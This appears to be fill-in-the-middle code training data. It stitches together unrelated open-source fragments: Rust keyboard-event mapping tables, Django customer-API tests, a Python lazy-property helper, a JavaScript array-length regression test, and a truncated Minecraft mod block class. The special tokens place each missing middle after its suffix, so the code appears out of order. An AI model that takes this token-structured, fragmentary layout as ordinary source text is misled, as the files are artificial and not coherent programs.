Key::Num7 if shift => "&",
Key::Num7 => "7",
Key::Num8 if shift => "*",
Key::Num8 => "8",
Key::Num9 if shift => "(",
Key::Num9 => "9",
Key::Semicolon if shift => ":",
Key::Semicolon => ";",
Key::Equal if shift => "+",
Key::Equal => "=",
Key::A if shift => "A",
Key::A => "a",
Key::B if shift => "B",
Key::B => "b",
Key::C if shift => "C",
Key::C => "c",
Key::D if shift => "D",
Key::D => "d",
Key::E if shift => "E",
Key::E => "e",
Key::F if shift => "F",
Key::F => "f",
Key::G if shift => "G",
Key::G => "g",
Key::H if shift => "H",
Key::H => "h",
Key::I if shift => "I",
Key::I => "i",
Key::J if shift => "J",
Key::J => "j",
Key::K if shift => "K",
Key::K => "k",
Key::L if shift => "L",
Key::L => "l",
Key::M if shift => "M",
Key::M => "m",
Key::N if shift => "N",
Key::N => "n",
Key::O if shift => "O",
Key::O => "o",
Key::P if shift => "P",
Key::P => "p",
Key::Q if shift => "Q",
Key::Q => "q",
Key::R if shift => "R",
Key::R => "r",
Key::S if shift => "S",
Key::S => "s",
Key::T if shift => "T",
Key::T => "t",
Key::U if shift => "U",
Key::U => "u",
Key::V if shift => "V",
Key::V => "v",
Key::W if shift => "W",
Key::W => "w",
Key::X if shift => "X",
Key::X => "x",
Key::Y if shift => "Y",
Key::Y => "y",
Key::Z if shift => "Z",
Key::Z => "z",
Key::LeftBracket if shift => "{",
Key::LeftBracket => "[",
Key::Backslash if shift => "|",
Key::Backslash => "\\",
Key::RightBracket if shift => "}",
Key::RightBracket => "]",
Key::World1 => "Unidentified",
Key::World2 => "Unidentified",
Key::Escape => "Escape",
Key::Enter => "Enter",
Key::Tab => "Tab",
Key::Backspace => "Backspace",
Key::Insert => "Insert",
Key::Delete => "Delete",
Key::Right => "ArrowRight",
Key::Left => "ArrowLeft",
Key::Down => "ArrowDown",
Key::Up => "ArrowUp",
Key::PageUp => "PageUp",
Key::PageDown => "PageDown",
Key::Home => "Home",
Key::End => "End",
Key::CapsLock => "CapsLock",
Key::ScrollLock => "ScrollLock",
Key::NumLock => "NumLock",
Key::PrintScreen => "PrintScreen",
Key::Pause => "Pause",
Key::F1 => "F1",
Key::F2 => "F2",
Key::F3 => "F3",
Key::F4 => "F4",
Key::F5 => "F5",
Key::F6 => "F6",
Key::F7 => "F7",
Key::F8 => "F8",
Key::F9 => "F9",
Key::F10 => "F10",
Key::F11 => "F11",
Key::F12 => "F12",
Key::F13 => "F13",
Key::F14 => "F14",
Key::F15 => "F15",
Key::F16 => "F16",
Key::F17 => "F17",
Key::F18 => "F18",
Key::F19 => "F19",
Key::F20 => "F20",
Key::F21 => "F21",
Key::F22 => "F22",
Key::F23 => "F23",
Key::F24 => "F24",
Key::F25 => "F25",
Key::Kp0 => "0",
Key::Kp1 => "1",
Key::Kp2 => "2",
Key::Kp3 => "3",
Key::Kp4 => "4",
Key::Kp5 => "5",
Key::Kp6 => "6",
Key::Kp7 => "7",
Key::Kp8 => "8",
Key::Kp9 => "9",
Key::KpDecimal => ".",
Key::KpDivide => "/",
Key::KpMultiply => "*",
Key::KpSubtract => "-",
Key::KpAdd => "+",
Key::KpEnter => "Enter",
Key::KpEqual => "=",
Key::LeftShift => "Shift",
Key::LeftControl => "Control",
Key::LeftAlt => "Alt",
Key::LeftSuper => "Super",
Key::RightShift => "Shift",
Key::RightControl => "Control",
Key::RightAlt => "Alt",
Key::RightSuper => "Super",
Key::Menu => "ContextMenu",
Key::NavigateForward => "BrowserForward",
Key::NavigateBackward => "BrowserBack",
})
}
fn key_from_string(key_string: &str, location: u32) -> Option<Key> {
match key_string {
" " => Some(Key::Space),
"\"" => Some(Key::Apostrophe),
"'" => Some(Key::Apostrophe),
"<" => Some(Key::Comma),
"," => Some(Key::Comma),
"_" => Some(Key::Minus),
"-" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Minus),
">" => Some(Key::Period),
"." if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Period),
"?" => Some(Key::Slash),
"/" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Slash),
"~" => Some(Key::GraveAccent),
"`" => Some(Key::GraveAccent),
")" => Some(Key::Num0),
"0" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num0),
"!" => Some(Key::Num1),
"1" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num1),
"@" => Some(Key::Num2),
"2" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num2),
"#" => Some(Key::Num3),
"3" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num3),
"$" => Some(Key::Num4),
"4" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num4),
"%" => Some(Key::Num5),
"5" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num5),
"^" => Some(Key::Num6),
"6" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num6),
"&" => Some(Key::Num7),
"7" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num7),
"*" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num8),
"8" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num8),
"(" => Some(Key::Num9),
"9" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Num9),
":" => Some(Key::Semicolon),
";" => Some(Key::Semicolon),
"+" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Equal),
"=" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Equal),
"A" => Some(Key::A),
"a" => Some(Key::A),
"B" => Some(Key::B),
"b" => Some(Key::B),
"C" => Some(Key::C),
"c" => Some(Key::C),
"D" => Some(Key::D),
"d" => Some(Key::D),
"E" => Some(Key::E),
"e" => Some(Key::E),
"F" => Some(Key::F),
"f" => Some(Key::F),
"G" => Some(Key::G),
"g" => Some(Key::G),
"H" => Some(Key::H),
"h" => Some(Key::H),
"I" => Some(Key::I),
"i" => Some(Key::I),
"J" => Some(Key::J),
"j" => Some(Key::J),
"K" => Some(Key::K),
"k" => Some(Key::K),
"L" => Some(Key::L),
"l" => Some(Key::L),
"M" => Some(Key::M),
"m" => Some(Key::M),
"N" => Some(Key::N),
"n" => Some(Key::N),
"O" => Some(Key::O),
"o" => Some(Key::O),
"P" => Some(Key::P),
"p" => Some(Key::P),
"Q" => Some(Key::Q),
"q" => Some(Key::Q),
"R" => Some(Key::R),
"r" => Some(Key::R),
"S" => Some(Key::S),
"s" => Some(Key::S),
"T" => Some(Key::T),
"t" => Some(Key::T),
"U" => Some(Key::U),
"u" => Some(Key::U),
"V" => Some(Key::V),
"v" => Some(Key::V),
"W" => Some(Key::W),
"w" => Some(Key::W),
"X" => Some(Key::X),
"x" => Some(Key::X),
"Y" => Some(Key::Y),
"y" => Some(Key::Y),
"Z" => Some(Key::Z),
"z" => Some(Key::Z),
"{" => Some(Key::LeftBracket),
"[" => Some(Key::LeftBracket),
"|" => Some(Key::Backslash),
"\\" => Some(Key::Backslash),
"}" => Some(Key::RightBracket),
"]" => Some(Key::RightBracket),
"Escape" => Some(Key::Escape),
"Enter" if location == KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD => Some(Key::Enter),
"Tab" => Some(Key::Tab),
"Backspace" => Some(Key::Backspace),
"Insert" => Some(Key::Insert),
"Delete" => Some(Key::Delete),
"ArrowRight" => Some(Key::Right),
"ArrowLeft" => Some(Key::Left),
"ArrowDown" => Some(Key::Down),
"ArrowUp" => Some(Key::Up),
"PageUp" => Some(Key::PageUp),
"PageDown" => Some(Key::PageDown),
"Home" => Some(Key::Home),
"End" => Some(Key::End),
"CapsLock" => Some(Key::CapsLock),
"ScrollLock" => Some(Key::ScrollLock),
"NumLock" => Some(Key::NumLock),
"PrintScreen" => Some(Key::PrintScreen),
"Pause" => Some(Key::Pause),
"F1" => Some(Key::F1),
"F2" => Some(Key::F2),
"F3" => Some(Key::F3),
"F4" => Some(Key::F4),
"F5" => Some(Key::F5),
"F6" => Some(Key::F6),
"F7" => Some(Key::F7),
"F8" => Some(Key::F8),
"F9" => Some(Key::F9),
"F10" => Some(Key::F10),
"F11" => Some(Key::F11),
"F12" => Some(Key::F12),
"F13" => Some(Key::F13),
"F14" => Some(Key::F14),
"F15" => Some(Key::F15),
"F16" => Some(Key::F16),
"F17" => Some(Key::F17),
"F18" => Some(Key::F18),
"F19" => Some(Key::F19),
"F20" => Some(Key::F20),
"F21" => Some(Key::F21),
"F22" => Some(Key::F22),
"F23" => Some(Key::F23),
"F24" => Some(Key::F24),
"F25" => Some(Key::F25),
"0" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp0),
"1" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp1),
"2" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp2),
"3" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp3),
"4" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp4),
"5" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp5),
"6" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp6),
"7" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp7),
"8" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp8),
"9" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::Kp9),
"." if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpDecimal),
"/" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpDivide),
"*" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpMultiply),
"-" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpSubtract),
"+" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpAdd),
"Enter" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpEnter),
"=" if location == KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD => Some(Key::KpEqual),
"Shift" if location == KeyboardEventConstants::DOM_KEY_LOCATION_LEFT => Some(Key::LeftShift),
"Control" if location == KeyboardEventConstants::DOM_KEY_LOCATION_LEFT => Some(Key::LeftControl),
"Alt" if location == KeyboardEventConstants::DOM_KEY_LOCATION_LEFT => Some(Key::LeftAlt),
"Super" if location == KeyboardEventConstants::DOM_KEY_LOCATION_LEFT => Some(Key::LeftSuper),
"Shift" if location == KeyboardEventConstants::DOM_KEY_LOCATION_RIGHT => Some(Key::RightShift),
"Control" if location == KeyboardEventConstants::DOM_KEY_LOCATION_RIGHT => Some(Key::RightControl),
"Alt" if location == KeyboardEventConstants::DOM_KEY_LOCATION_RIGHT => Some(Key::RightAlt),
"Super" if location == KeyboardEventConstants::DOM_KEY_LOCATION_RIGHT => Some(Key::RightSuper),
"ContextMenu" => Some(Key::Menu),
"BrowserForward" => Some(Key::NavigateForward),
"BrowserBack" => Some(Key::NavigateBackward),
_ => None
}
}
// https://w3c.github.io/uievents-code/#code-value-tables
fn code_value(key: Key) -> &'static str {
match key {
Key::Space => "Space",
Key::Apostrophe => "Quote",
Key::Comma => "Comma",
Key::Minus => "Minus",
Key::Period => "Period",
Key::Slash => "Slash",
Key::GraveAccent => "Backquote",
Key::Num0 => "Digit0",
Key::Num1 => "Digit1",
Key::Num2 => "Digit2",
Key::Num3 => "Digit3",
Key::Num4 => "Digit4",
Key::Num5 => "Digit5",
Key::Num6 => "Digit6",
Key::Num7 => "Digit7",
Key::Num8 => "Digit8",
Key::Num9 => "Digit9",
Key::Semicolon => "Semicolon",
Key::Equal => "Equal",
Key::A => "KeyA",
Key::B => "KeyB",
Key::C => "KeyC",
Key::D => "KeyD",
Key::E => "KeyE",
Key::F => "KeyF",
Key::G => "KeyG",
Key::H => "KeyH",
Key::I => "KeyI",
Key::J => "KeyJ",
Key::K => "KeyK",
Key::L => "KeyL",
Key::M => "KeyM",
Key::N => "KeyN",
Key::O => "KeyO",
Key::P => "KeyP",
Key::Q => "KeyQ",
Key::R => "KeyR",
Key::S => "KeyS",
Key::T => "KeyT",
Key::U => "KeyU",
Key::V => "KeyV",
Key::W => "KeyW",
Key::X => "KeyX",
Key::Y => "KeyY",
Key::Z => "KeyZ",
Key::LeftBracket => "BracketLeft",
Key::Backslash => "Backslash",
Key::RightBracket => "BracketRight",
Key::World1 |
Key::World2 => panic!("unknown char code for {:?}", key),
Key::Escape => "Escape",
Key::Enter => "Enter",
Key::Tab => "Tab",
Key::Backspace => "Backspace",
Key::Insert => "Insert",
Key::Delete => "Delete",
Key::Right => "ArrowRight",
Key::Left => "ArrowLeft",
Key::Down => "ArrowDown",
Key::Up => "ArrowUp",
Key::PageUp => "PageUp",
Key::PageDown => "PageDown",
Key::Home => "Home",
Key::End => "End",
Key::CapsLock => "CapsLock",
Key::ScrollLock => "ScrollLock",
Key::NumLock => "NumLock",
Key::PrintScreen => "PrintScreen",
Key::Pause => "Pause",
Key::F1 => "F1",
Key::F2 => "F2",
Key::F3 => "F3",
Key::F4 => "F4",
Key::F5 => "F5",
Key::F6 => "F6",
Key::F7 => "F7",
Key::F8 => "F8",
Key::F9 => "F9",
Key::F10 => "F10",
Key::F11 => "F11",
Key::F12 => "F12",
Key::F13 => "F13",
Key::F14 => "F14",
Key::F15 => "F15",
Key::F16 => "F16",
Key::F17 => "F17",
Key::F18 => "F18",
Key::F19 => "F19",
Key::F20 => "F20",
Key::F21 => "F21",
Key::F22 => "F22",
Key::F23 => "F23",
Key::F24 => "F24",
Key::F25 => "F25",
Key::Kp0 => "Numpad0",
Key::Kp1 => "Numpad1",
Key::Kp2 => "Numpad2",
Key::Kp3 => "Numpad3",
Key::Kp4 => "Numpad4",
Key::Kp5 => "Numpad5",
Key::Kp6 => "Numpad6",
Key::Kp7 => "Numpad7",
Key::Kp8 => "Numpad8",
Key::Kp9 => "Numpad9",
Key::KpDecimal => "NumpadDecimal",
Key::KpDivide => "NumpadDivide",
Key::KpMultiply => "NumpadMultiply",
Key::KpSubtract => "NumpadSubtract",
Key::KpAdd => "NumpadAdd",
Key::KpEnter => "NumpadEnter",
Key::KpEqual => "NumpadEqual",
Key::LeftShift | Key::RightShift => "Shift",
Key::LeftControl | Key::RightControl => "Control",
Key::LeftAlt | Key::RightAlt => "Alt",
Key::LeftSuper | Key::RightSuper => "Super",
Key::Menu => "ContextMenu",
Key::NavigateForward => "BrowserForward",
Key::NavigateBackward => "BrowserBackward",
}
}
fn key_location(key: Key) -> u32 {
match key {
Key::Kp0 | Key::Kp1 | Key::Kp2 |
Key::Kp3 | Key::Kp4 | Key::Kp5 |
Key::Kp6 | Key::Kp7 | Key::Kp8 |
Key::Kp9 | Key::KpDecimal |
Key::KpDivide | Key::KpMultiply |
Key::KpSubtract | Key::KpAdd |
Key::KpEnter | Key::KpEqual =>
KeyboardEventConstants::DOM_KEY_LOCATION_NUMPAD,
Key::LeftShift | Key::LeftAlt |
Key::LeftControl | Key::LeftSuper =>
KeyboardEventConstants::DOM_KEY_LOCATION_LEFT,
Key::RightShift | Key::RightAlt |
Key::RightControl | Key::RightSuper =>
KeyboardEventConstants::DOM_KEY_LOCATION_RIGHT,
_ => KeyboardEventConstants::DOM_KEY_LOCATION_STANDARD,
}
}
// https://w3c.github.io/uievents/#legacy-key-models
fn key_keycode(key: Key) -> u32 {
match key {
// https://w3c.github.io/uievents/#legacy-key-models
Key::Backspace => 8,
Key::Tab => 9,
Key::Enter => 13,
Key::LeftShift | Key::RightShift => 16,<|fim▁hole|> Key::Space => 32,
Key::PageUp => 33,
Key::PageDown => 34,
Key::End => 35,
Key::Home => 36,
Key::Left => 37,
Key::Up => 38,
Key::Right => 39,
Key::Down => 40,
Key::Delete => 46,
// https://w3c.github.io/uievents/#optionally-fixed-virtual-key-codes
Key::Semicolon => 186,
Key::Equal => 187,
Key::Comma => 188,
Key::Minus => 189,
Key::Period => 190,
Key::Slash => 191,
Key::LeftBracket => 219,
Key::Backslash => 220,
Key::RightBracket => 221,
Key::Apostrophe => 222,
//§ B.2.1.3
Key::Num0 |
Key::Num1 |
Key::Num2 |
Key::Num3 |
Key::Num4 |
Key::Num5 |
Key::Num6 |
Key::Num7 |
Key::Num8 |
Key::Num9 => key as u32 - Key::Num0 as u32 + '0' as u32,
//§ B.2.1.4
Key::A |
Key::B |
Key::C |
Key::D |
Key::E |
Key::F |
Key::G |
Key::H |
Key::I |
Key::J |
Key::K |
Key::L |
Key::M |
Key::N |
Key::O |
Key::P |
Key::Q |
Key::R |
Key::S |
Key::T |
Key::U |
Key::V |
Key::W |
Key::X |
Key::Y |
Key::Z => key as u32 - Key::A as u32 + 'A' as u32,
//§ B.2.1.8
_ => 0
}
}
#[derive(HeapSizeOf)]
pub struct KeyEventProperties {
pub key_string: Cow<'static, str>,
pub code: &'static str,
pub location: u32,
pub char_code: Option<u32>,
pub key_code: u32,
}
impl KeyEventProperties {
pub fn is_printable(&self) -> bool {
self.char_code.is_some()
}
}
impl KeyboardEventMethods for KeyboardEvent {
// https://w3c.github.io/uievents/#widl-KeyboardEvent-initKeyboardEvent
fn InitKeyboardEvent(&self,
type_arg: DOMString,
can_bubble_arg: bool,
cancelable_arg: bool,
view_arg: Option<&Window>,
key_arg: DOMString,
location_arg: u32,
_modifiers_list_arg: DOMString,
repeat: bool,
_locale: DOMString) {
if self.upcast::<Event>().dispatching() {
return;
}
self.upcast::<UIEvent>()
.InitUIEvent(type_arg, can_bubble_arg, cancelable_arg, view_arg, 0);
*self.key_string.borrow_mut() = key_arg;
self.location.set(location_arg);
self.repeat.set(repeat);
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-key
fn Key(&self) -> DOMString {
self.key_string.borrow().clone()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-code
fn Code(&self) -> DOMString {
self.code.borrow().clone()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-location
fn Location(&self) -> u32 {
self.location.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-ctrlKey
fn CtrlKey(&self) -> bool {
self.ctrl.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-shiftKey
fn ShiftKey(&self) -> bool {
self.shift.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-altKey
fn AltKey(&self) -> bool {
self.alt.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-metaKey
fn MetaKey(&self) -> bool {
self.meta.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-repeat
fn Repeat(&self) -> bool {
self.repeat.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-isComposing
fn IsComposing(&self) -> bool {
self.is_composing.get()
}
// https://w3c.github.io/uievents/#dom-keyboardevent-getmodifierstate
fn GetModifierState(&self, key_arg: DOMString) -> bool {
match &*key_arg {
"Ctrl" => self.CtrlKey(),
"Alt" => self.AltKey(),
"Shift" => self.ShiftKey(),
"Meta" => self.MetaKey(),
"AltGraph" | "CapsLock" | "NumLock" | "ScrollLock" | "Accel" |
"Fn" | "FnLock" | "Hyper" | "OS" | "Symbol" | "SymbolLock" => false, //FIXME
_ => false,
}
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-charCode
fn CharCode(&self) -> u32 {
self.char_code.get().unwrap_or(0)
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-keyCode
fn KeyCode(&self) -> u32 {
self.key_code.get()
}
// https://w3c.github.io/uievents/#widl-KeyboardEvent-which
fn Which(&self) -> u32 {
self.char_code.get().unwrap_or(self.KeyCode())
}
// https://dom.spec.whatwg.org/#dom-event-istrusted
fn IsTrusted(&self) -> bool {
self.uievent.IsTrusted()
}
}<|fim▁end|>
|
Key::LeftControl | Key::RightControl => 17,
Key::LeftAlt | Key::RightAlt => 18,
Key::CapsLock => 20,
Key::Escape => 27,
|
<|file_name|>tests.py<|end_file_name|><|fim▁begin|>import django
django.setup()
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APITestCase
from rest_framework.test import APIClient
from customers.models import Customer, Email
class CustomersTest(APITestCase, TestCase):
def test_api_should_accept_multiple_emails_for_new_customers(self):
customer = self.get_default_customer()
customer['emails'].append({
"address": "[email protected]",
"description": "Professional"
})
customer['emails'].append({
"address": "[email protected]",
"description": "Personal"
})
response = self.client.post('/api/customers', customer, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(Customer.objects.count(), 1)
self.assertEqual(Email.objects.count(), 2)
def test_api_should_not_accept_empty_email(self):<|fim▁hole|>
def test_api_should_not_accept_equal_emails(self):
customer = self.get_default_customer()
customer['emails'].append({
"address": "[email protected]",
"description": "Professional"
})
customer['emails'].append({
"address": "[email protected]",
"description": "Personal"
})
response = self.client.post('/api/customers', customer, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def get_default_customer(self):
return {
"name": "Jhon Doe",
"date_of_birth": "1990-3-3",
"gender": "M",
"emails": []
};<|fim▁end|>
|
customer = self.get_default_customer()
response = self.client.post('/api/customers', customer, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>'''
salt.utils
~~~~~~~~~~
'''
<|fim▁hole|> meant to be used for lazy evaluation of an object attribute.
property should represent non-mutable data, as it replaces itself.
http://stackoverflow.com/a/6849299/564003
'''
def __init__(self, fget):
self.fget = fget
self.func_name = fget.__name__
def __get__(self, obj, cls):
if obj is None:
return None
value = self.fget(obj)
setattr(obj, self.func_name, value)
return value<|fim▁end|>
|
class lazy_property(object):
'''
|
<|file_name|>regress-465980-02.js<|end_file_name|><|fim▁begin|>/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS" basis,
* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
* for the specific language governing rights and limitations under the
* License.
*
* The Original Code is JavaScript Engine testing utilities.
*
* The Initial Developer of the Original Code is
* Mozilla Foundation.
* Portions created by the Initial Developer are Copyright (C) 2008
* the Initial Developer. All Rights Reserved.
*
* Contributor(s): Jeff Walden
*
* Alternatively, the contents of this file may be used under the terms of
* either the GNU General Public License Version 2 or later (the "GPL"), or
* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
* in which case the provisions of the GPL or the LGPL are applicable instead
* of those above. If you wish to allow use of your version of this file only
* under the terms of either the GPL or the LGPL, and not to allow others to
* use your version of this file under the terms of the MPL, indicate your
* decision by deleting the provisions above and replace them with the notice
* and other provisions required by the GPL or the LGPL. If you do not delete
* the provisions above, a recipient may use your version of this file under
* the terms of any one of the MPL, the GPL or the LGPL.
*
* ***** END LICENSE BLOCK ***** */
//-----------------------------------------------------------------------------
var BUGNUMBER = 465980;
var summary = 'Do not crash @ InitArrayElements';
var actual = '';
var expect = '';
//-----------------------------------------------------------------------------
test();
//-----------------------------------------------------------------------------
function test()
{
enterFunc ('test');
printBugNumber(BUGNUMBER);
printStatus (summary);
function describe(name, startLength, pushArgs, expectThrow, expectLength)
{
return name + "(" + startLength + ", " +
"[" + pushArgs.join(", ") + "], " +
expectThrow + ", " +
expectLength + ")";
}
var push = Array.prototype.push;
var unshift = Array.prototype.unshift;
function testArrayPush(startLength, pushArgs, expectThrow, expectLength)
{
print("running testArrayPush(" +
startLength + ", " +
"[" + pushArgs.join(", ") + "], " +
expectThrow + ", " +
expectLength + ")...");
var a = new Array(startLength);
try
{
push.apply(a, pushArgs);
if (expectThrow)
{
throw "expected to throw for " +
describe("testArrayPush", startLength, pushArgs, expectThrow,
expectLength);
}
}
catch (e)
{
if (!(e instanceof RangeError))
{
throw "unexpected exception type thrown: " + e + " for " +
describe("testArrayPush", startLength, pushArgs, expectThrow,<|fim▁hole|> throw "unexpected exception " + e + " for " +
describe("testArrayPush", startLength, pushArgs, expectThrow,
expectLength);
}
}
if (a.length !== expectLength)
{
throw "unexpected modified-array length for " +
describe("testArrayPush", startLength, pushArgs, expectThrow,
expectLength);
}
for (var i = 0, sz = pushArgs.length; i < sz; i++)
{
var index = i + startLength;
if (a[index] !== pushArgs[i])
{
throw "unexpected value " + a[index] +
" at index " + index + " (" + i + ") during " +
describe("testArrayPush", startLength, pushArgs, expectThrow,
expectLength) + ", expected " + pushArgs[i];
}
}
}
function testArrayUnshift(startLength, unshiftArgs, expectThrow, expectLength)
{
print("running testArrayUnshift(" +
startLength + ", " +
"[" + unshiftArgs.join(", ") + "], " +
expectThrow + ", " +
expectLength + ")...");
var a = new Array(startLength);
try
{
unshift.apply(a, unshiftArgs);
if (expectThrow)
{
throw "expected to throw for " +
describe("testArrayUnshift", startLength, unshiftArgs, expectThrow,
expectLength);
}
}
catch (e)
{
if (!(e instanceof RangeError))
{
throw "unexpected exception type thrown: " + e + " for " +
describe("testArrayUnshift", startLength, unshiftArgs, expectThrow,
expectLength);
}
if (!expectThrow)
{
throw "unexpected exception " + e + " for " +
describe("testArrayUnshift", startLength, unshiftArgs, expectThrow,
expectLength);
}
}
if (a.length !== expectLength)
{
throw "unexpected modified-array length for " +
describe("testArrayUnshift", startLength, unshiftArgs, expectThrow,
expectLength);
}
for (var i = 0, sz = unshiftArgs.length; i < sz; i++)
{
if (a[i] !== unshiftArgs[i])
{
throw "unexpected value at index " + i + " during " +
describe("testArrayUnshift", startLength, unshiftArgs, expectThrow,
expectLength);
}
}
}
var failed = true;
try
{
var foo = "foo", bar = "bar", baz = "baz";
testArrayPush(4294967294, [foo], false, 4294967295);
testArrayPush(4294967294, [foo, bar], true, 4294967295);
testArrayPush(4294967294, [foo, bar, baz], true, 4294967295);
testArrayPush(4294967295, [foo], true, 4294967295);
testArrayPush(4294967295, [foo, bar], true, 4294967295);
testArrayPush(4294967295, [foo, bar, baz], true, 4294967295);
testArrayUnshift(4294967294, [foo], false, 4294967295);
testArrayUnshift(4294967294, [foo, bar], true, 4294967294);
testArrayUnshift(4294967294, [foo, bar, baz], true, 4294967294);
testArrayUnshift(4294967295, [foo], true, 4294967295);
testArrayUnshift(4294967295, [foo, bar], true, 4294967295);
testArrayUnshift(4294967295, [foo, bar, baz], true, 4294967295);
}
catch (e)
{
actual = e + '';
}
reportCompare(expect, actual, summary);
exitFunc ('test');
}<|fim▁end|>
|
expectLength);
}
if (!expectThrow)
{
|
<|file_name|>BlockCombustionEngine.java<|end_file_name|><|fim▁begin|>package com.plutomc.power.common.blocks;
import com.plutomc.core.common.blocks.BlockMetal;
import com.plutomc.power.Power;
import com.plutomc.power.common.tileentities.TileEntityCombustionEngine;
import com.plutomc.power.init.BlockRegistry;
import com.plutomc.power.init.GuiHandler;
import net.minecraft.block.ITileEntityProvider;
import net.minecraft.block.properties.PropertyDirection;
import net.minecraft.block.state.BlockStateContainer;
import net.minecraft.block.state.IBlockState;
import net.minecraft.entity.EntityLivingBase;
import net.minecraft.entity.player.EntityPlayer;
import net.minecraft.inventory.InventoryHelper;
import net.minecraft.item.ItemStack;
import net.minecraft.tileentity.TileEntity;
import net.minecraft.util.EnumFacing;
import net.minecraft.util.EnumHand;
import net.minecraft.util.math.BlockPos;
import net.minecraft.world.World;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
/**
* plutomc_power
* Copyright (C) 2016 Kevin Boxhoorn
*
* plutomc_power is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* plutomc_power is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with plutomc_power. If not, see <http://www.gnu.org/licenses/>.
*/
public class BlockCombustionEngine extends BlockMetal implements ITileEntityProvider
{
public static final PropertyDirection FACING = PropertyDirection.create("facing", EnumFacing.Plane.HORIZONTAL);
public BlockCombustionEngine()
{
super(BlockRegistry.Data.COMBUSTION_ENGINE);
setDefaultState(blockState.getBaseState().withProperty(FACING, EnumFacing.NORTH));
}
@Nonnull
@Override
protected BlockStateContainer createBlockState()
{
return new BlockStateContainer(this, FACING);
}
@Nonnull
@Override
public IBlockState getStateForPlacement(World world, BlockPos pos, EnumFacing facing, float hitX, float hitY, float hitZ, int meta, EntityLivingBase placer, EnumHand hand)
{
return getDefaultState().withProperty(FACING, placer.getHorizontalFacing().getOpposite());
}
@Nonnull
@Override
public IBlockState getStateFromMeta(int meta)
{
return getDefaultState().withProperty(FACING, EnumFacing.getFront(meta));
}
@Override
public int getMetaFromState(IBlockState state)
{
return state.getValue(FACING).getIndex();
}
@Nullable
@Override
public TileEntity createNewTileEntity(World worldIn, int meta)
{<|fim▁hole|> return new TileEntityCombustionEngine();
}
@Override
public void breakBlock(World worldIn, BlockPos pos, IBlockState state)
{
TileEntity tileEntity = worldIn.getTileEntity(pos);
if (tileEntity instanceof TileEntityCombustionEngine)
{
